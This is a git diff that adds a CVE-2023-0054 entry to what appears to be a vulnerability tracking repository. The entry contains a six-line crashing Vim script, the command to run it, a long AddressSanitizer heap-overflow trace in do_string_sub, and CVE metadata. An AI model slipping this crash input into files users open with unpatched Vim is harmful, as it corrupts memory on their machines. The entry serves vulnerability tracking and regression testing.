diff --git a/cve/vim/2023/CVE-2023-0054/README.md b/cve/vim/2023/CVE-2023-0054/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..e6b2b573874f92567221900354816ccdcdf6497f
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-0054/README.md
@@ -0,0 +1,203 @@
+# 漏洞CVE-2023-0054
+## Description
+Out-of-bounds Write in function do_string_sub at eval.c:7338
+
+## Vim Version
+```shell
+git log
+commit ea720aea851e645f4c8ec3b20afb27c7ca38184c (HEAD -> master, tag: v9.0.1137, origin/master, origin/HEAD)
+```
+
+## Proof of Concept
+```shell
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_how01_s.dat -c :qa!
+```
+
+```
+=================================================================
+==2733==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6110000016bf at pc 0x000000485398 bp 0x7ffd146f4710 sp 0x7ffd146f3ed0
+WRITE of size 2 at 0x6110000016bf thread T0
+    #0 0x485397 in strcpy (/home/fuzz/vim/src/vim+0x485397)
+    #1 0x70174b in do_string_sub /home/fuzz/vim/src/eval.c:7338:6
+    #2 0x8d6830 in modify_fname /home/fuzz/vim/src/filepath.c:672:12
+    #3 0x82ca93 in eval_vars /home/fuzz/vim/src/ex_docmd.c:9475:15
+    #4 0x827395 in expand_filename /home/fuzz/vim/src/ex_docmd.c:5038:9
+    #5 0x803e67 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2515:9
+    #6 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #7 0x11b5a9d in call_user_func /home/fuzz/vim/src/userfunc.c:3027:2
+    #8 0x11b1c2d in call_user_func_check /home/fuzz/vim/src/userfunc.c:3189:2
+    #9 0x11ab83c in call_func /home/fuzz/vim/src/userfunc.c:3745:11
+    #10 0x11a8b6c in get_func_tv /home/fuzz/vim/src/userfunc.c:1923:8
+    #11 0x706524 in eval_func /home/fuzz/vim/src/eval.c:2335:8
+    #12 0x704691 in eval9 /home/fuzz/vim/src/eval.c:4239:9
+    #13 0x7103f4 in eval8 /home/fuzz/vim/src/eval.c:3799:11
+    #14 0x70e1c8 in eval7 /home/fuzz/vim/src/eval.c:3603:9
+    #15 0x70b11f in eval6 /home/fuzz/vim/src/eval.c:3382:9
+    #16 0x709c52 in eval5 /home/fuzz/vim/src/eval.c:3271:9
+    #17 0x70843c in eval4 /home/fuzz/vim/src/eval.c:3122:9
+    #18 0x706b3f in eval3 /home/fuzz/vim/src/eval.c:2983:9
+    #19 0x6e034f in eval2 /home/fuzz/vim/src/eval.c:2857:9
+    #20 0x6c061f in eval1 /home/fuzz/vim/src/eval.c:2703:9
+    #21 0x6df165 in eval0_retarg /home/fuzz/vim/src/eval.c:2614:11
+    #22 0x6bd247 in eval0 /home/fuzz/vim/src/eval.c:2548:12
+    #23 0x6c4aeb in eval_to_string_eap /home/fuzz/vim/src/eval.c:629:6
+    #24 0x6c4ca9 in eval_to_string /home/fuzz/vim/src/eval.c:648:12
+    #25 0xd340c4 in vim_regsub_both /home/fuzz/vim/src/regexp.c:2129:25
+    #26 0xd3817b in vim_regsub_multi /home/fuzz/vim/src/regexp.c:1964:14
+    #27 0x7da45d in ex_substitute /home/fuzz/vim/src/ex_cmds.c:4484:12
+    #28 0x804e61 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2581:2
+    #29 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #30 0x11b5a9d in call_user_func /home/fuzz/vim/src/userfunc.c:3027:2
+    #31 0x11b1c2d in call_user_func_check /home/fuzz/vim/src/userfunc.c:3189:2
+    #32 0x11ab83c in call_func /home/fuzz/vim/src/userfunc.c:3745:11
+    #33 0x11a8b6c in get_func_tv /home/fuzz/vim/src/userfunc.c:1923:8
+    #34 0x706524 in eval_func /home/fuzz/vim/src/eval.c:2335:8
+    #35 0x704691 in eval9 /home/fuzz/vim/src/eval.c:4239:9
+    #36 0x7103f4 in eval8 /home/fuzz/vim/src/eval.c:3799:11
+    #37 0x70e1c8 in eval7 /home/fuzz/vim/src/eval.c:3603:9
+    #38 0x70b11f in eval6 /home/fuzz/vim/src/eval.c:3382:9
+    #39 0x709c52 in eval5 /home/fuzz/vim/src/eval.c:3271:9
+    #40 0x70843c in eval4 /home/fuzz/vim/src/eval.c:3122:9
+    #41 0x706b3f in eval3 /home/fuzz/vim/src/eval.c:2983:9
+    #42 0x6e034f in eval2 /home/fuzz/vim/src/eval.c:2857:9
+    #43 0x6c061f in eval1 /home/fuzz/vim/src/eval.c:2703:9
+    #44 0x6df165 in eval0_retarg /home/fuzz/vim/src/eval.c:2614:11
+    #45 0x6bd247 in eval0 /home/fuzz/vim/src/eval.c:2548:12
+    #46 0x6c4aeb in eval_to_string_eap /home/fuzz/vim/src/eval.c:629:6
+    #47 0x6c4ca9 in eval_to_string /home/fuzz/vim/src/eval.c:648:12
+    #48 0xd340c4 in vim_regsub_both /home/fuzz/vim/src/regexp.c:2129:25
+    #49 0xd3817b in vim_regsub_multi /home/fuzz/vim/src/regexp.c:1964:14
+    #50 0x7da45d in ex_substitute /home/fuzz/vim/src/ex_cmds.c:4484:12
+    #51 0x804e61 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2581:2
+    #52 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #53 0x11b5a9d in call_user_func /home/fuzz/vim/src/userfunc.c:3027:2
+    #54 0x11b1c2d in call_user_func_check /home/fuzz/vim/src/userfunc.c:3189:2
+    #55 0x11ab83c in call_func /home/fuzz/vim/src/userfunc.c:3745:11
+    #56 0x11a8b6c in get_func_tv /home/fuzz/vim/src/userfunc.c:1923:8
+    #57 0x706524 in eval_func /home/fuzz/vim/src/eval.c:2335:8
+    #58 0x704691 in eval9 /home/fuzz/vim/src/eval.c:4239:9
+    #59 0x7103f4 in eval8 /home/fuzz/vim/src/eval.c:3799:11
+    #60 0x70e1c8 in eval7 /home/fuzz/vim/src/eval.c:3603:9
+    #61 0x70b11f in eval6 /home/fuzz/vim/src/eval.c:3382:9
+    #62 0x709c52 in eval5 /home/fuzz/vim/src/eval.c:3271:9
+    #63 0x70843c in eval4 /home/fuzz/vim/src/eval.c:3122:9
+    #64 0x706b3f in eval3 /home/fuzz/vim/src/eval.c:2983:9
+    #65 0x6e034f in eval2 /home/fuzz/vim/src/eval.c:2857:9
+    #66 0x6c061f in eval1 /home/fuzz/vim/src/eval.c:2703:9
+    #67 0x6df165 in eval0_retarg /home/fuzz/vim/src/eval.c:2614:11
+    #68 0x6bd247 in eval0 /home/fuzz/vim/src/eval.c:2548:12
+    #69 0x6c4aeb in eval_to_string_eap /home/fuzz/vim/src/eval.c:629:6
+    #70 0x6c4ca9 in eval_to_string /home/fuzz/vim/src/eval.c:648:12
+    #71 0xd340c4 in vim_regsub_both /home/fuzz/vim/src/regexp.c:2129:25
+    #72 0xd3817b in vim_regsub_multi /home/fuzz/vim/src/regexp.c:1964:14
+    #73 0x7da45d in ex_substitute /home/fuzz/vim/src/ex_cmds.c:4484:12
+    #74 0x804e61 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2581:2
+    #75 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #76 0x11b5a9d in call_user_func /home/fuzz/vim/src/userfunc.c:3027:2
+    #77 0x11b1c2d in call_user_func_check /home/fuzz/vim/src/userfunc.c:3189:2
+    #78 0x11ab83c in call_func /home/fuzz/vim/src/userfunc.c:3745:11
+    #79 0x11a8b6c in get_func_tv /home/fuzz/vim/src/userfunc.c:1923:8
+    #80 0x706524 in eval_func /home/fuzz/vim/src/eval.c:2335:8
+    #81 0x704691 in eval9 /home/fuzz/vim/src/eval.c:4239:9
+    #82 0x7103f4 in eval8 /home/fuzz/vim/src/eval.c:3799:11
+    #83 0x70e1c8 in eval7 /home/fuzz/vim/src/eval.c:3603:9
+    #84 0x70b11f in eval6 /home/fuzz/vim/src/eval.c:3382:9
+    #85 0x709c52 in eval5 /home/fuzz/vim/src/eval.c:3271:9
+    #86 0x70843c in eval4 /home/fuzz/vim/src/eval.c:3122:9
+    #87 0x706b3f in eval3 /home/fuzz/vim/src/eval.c:2983:9
+    #88 0x6e034f in eval2 /home/fuzz/vim/src/eval.c:2857:9
+    #89 0x6c061f in eval1 /home/fuzz/vim/src/eval.c:2703:9
+    #90 0x6df165 in eval0_retarg /home/fuzz/vim/src/eval.c:2614:11
+    #91 0x6bd247 in eval0 /home/fuzz/vim/src/eval.c:2548:12
+    #92 0x6c4aeb in eval_to_string_eap /home/fuzz/vim/src/eval.c:629:6
+    #93 0x6c4ca9 in eval_to_string /home/fuzz/vim/src/eval.c:648:12
+    #94 0xd340c4 in vim_regsub_both /home/fuzz/vim/src/regexp.c:2129:25
+    #95 0xd3817b in vim_regsub_multi /home/fuzz/vim/src/regexp.c:1964:14
+    #96 0x7da45d in ex_substitute /home/fuzz/vim/src/ex_cmds.c:4484:12
+    #97 0x804e61 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2581:2
+    #98 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #99 0xea0575 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5
+    #100 0xe9cfd6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12
+    #101 0xe9c90c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14
+    #102 0xe9bfee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2
+    #103 0x804e61 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2581:2
+    #104 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #105 0x7f65d1 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:588:12
+    #106 0x14b9732 in exe_commands /home/fuzz/vim/src/main.c:3146:2
+    #107 0x14b58ce in vim_main2 /home/fuzz/vim/src/main.c:782:2
+    #108 0x14aad69 in main /home/fuzz/vim/src/main.c:433:12
+    #109 0x7f17d3eaa082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+    #110 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad)
+
+0x6110000016bf is located 1 bytes to the left of 200-byte region [0x6110000016c0,0x611000001788)
+allocated by thread T0 here:
+    #0 0x49a029 in realloc (/home/fuzz/vim/src/vim+0x49a029)
+    #1 0x4ccc84 in ga_grow_inner /home/fuzz/vim/src/alloc.c:747:10
+    #2 0x4cc8e5 in ga_grow /home/fuzz/vim/src/alloc.c:712:9
+    #3 0x70124a in do_string_sub /home/fuzz/vim/src/eval.c:7315:10
+    #4 0x8d6830 in modify_fname /home/fuzz/vim/src/filepath.c:672:12
+    #5 0x82ca93 in eval_vars /home/fuzz/vim/src/ex_docmd.c:9475:15
+    #6 0x827395 in expand_filename /home/fuzz/vim/src/ex_docmd.c:5038:9
+    #7 0x803e67 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2515:9
+    #8 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #9 0x11b5a9d in call_user_func /home/fuzz/vim/src/userfunc.c:3027:2
+    #10 0x11b1c2d in call_user_func_check /home/fuzz/vim/src/userfunc.c:3189:2
+    #11 0x11ab83c in call_func /home/fuzz/vim/src/userfunc.c:3745:11
+    #12 0x11a8b6c in get_func_tv /home/fuzz/vim/src/userfunc.c:1923:8
+    #13 0x706524 in eval_func /home/fuzz/vim/src/eval.c:2335:8
+    #14 0x704691 in eval9 /home/fuzz/vim/src/eval.c:4239:9
+    #15 0x7103f4 in eval8 /home/fuzz/vim/src/eval.c:3799:11
+    #16 0x70e1c8 in eval7 /home/fuzz/vim/src/eval.c:3603:9
+    #17 0x70b11f in eval6 /home/fuzz/vim/src/eval.c:3382:9
+    #18 0x709c52 in eval5 /home/fuzz/vim/src/eval.c:3271:9
+    #19 0x70843c in eval4 /home/fuzz/vim/src/eval.c:3122:9
+    #20 0x706b3f in eval3 /home/fuzz/vim/src/eval.c:2983:9
+    #21 0x6e034f in eval2 /home/fuzz/vim/src/eval.c:2857:9
+    #22 0x6c061f in eval1 /home/fuzz/vim/src/eval.c:2703:9
+    #23 0x6df165 in eval0_retarg /home/fuzz/vim/src/eval.c:2614:11
+    #24 0x6bd247 in eval0 /home/fuzz/vim/src/eval.c:2548:12
+    #25 0x6c4aeb in eval_to_string_eap /home/fuzz/vim/src/eval.c:629:6
+    #26 0x6c4ca9 in eval_to_string /home/fuzz/vim/src/eval.c:648:12
+    #27 0xd340c4 in vim_regsub_both /home/fuzz/vim/src/regexp.c:2129:25
+    #28 0xd3817b in vim_regsub_multi /home/fuzz/vim/src/regexp.c:1964:14
+    #29 0x7da45d in ex_substitute /home/fuzz/vim/src/ex_cmds.c:4484:12
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x485397) in strcpy
+Shadow bytes around the buggy address:
+  0x0c227fff8280: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x0c227fff8290: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x0c227fff82a0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
+  0x0c227fff82b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c227fff82c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
+=>0x0c227fff82d0: fa fa fa fa fa fa fa[fa]00 00 00 00 00 00 00 00
+  0x0c227fff82e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c227fff82f0: 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c227fff8300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c227fff8310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c227fff8320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==2733==ABORTING
+```
+
+## Impact
+
+This vulnerability is capable of crashing software, modify memory, and possible remote execution.
diff --git a/cve/vim/2023/CVE-2023-0054/poc_how01_s.dat b/cve/vim/2023/CVE-2023-0054/poc_how01_s.dat
new file mode 100644
index 0000000000000000000000000000000000000000..c1cc82a5cfeeddec2c6bde88e3ecfb55120b4a38
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-0054/poc_how01_s.dat
@@ -0,0 +1,6 @@
+fu Re000(g,n)
+s
+r%:s000
+endf
+n0
+s/\%')/\=Re000('',0)
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0054.yaml b/cve/vim/2023/yaml/CVE-2023-0054.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..f8c0a2ceba7221df8f702b0e0613d113ffee88cc
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-0054.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-0054
+source: https://huntr.dev/bounties/b289ee0f-fd16-4147-bd01-c6289c45e49d/
+info:
+  name: Vim是一款基于UNIX平台的编辑器，由vi发展而来。
+  severity: high
+  description: |
+    GitHub仓库vim/vim在9.0.1145之前版本存在越界写入。
+  scope-of-influence:
+    vim < 9.0.1145
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0054
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2023-0054
+    cwe-id: CWE-787
+    cnvd-id: None
+    kve-id: None
+  tags: cve2023, 越界写入
+  
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index d83e8b4f7d85f277310e0c2a15fed2adec5b3dff..e90268d4f2623bb2d36adc670bd2982f6fb7ff52 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -80,6 +80,7 @@ cve:
     - CVE-2022-2264
     - CVE-2022-2598
     - CVE-2023-0433
+    - CVE-2023-0054
   openssl:
     - CVE-2022-1292
     - CVE-2022-2274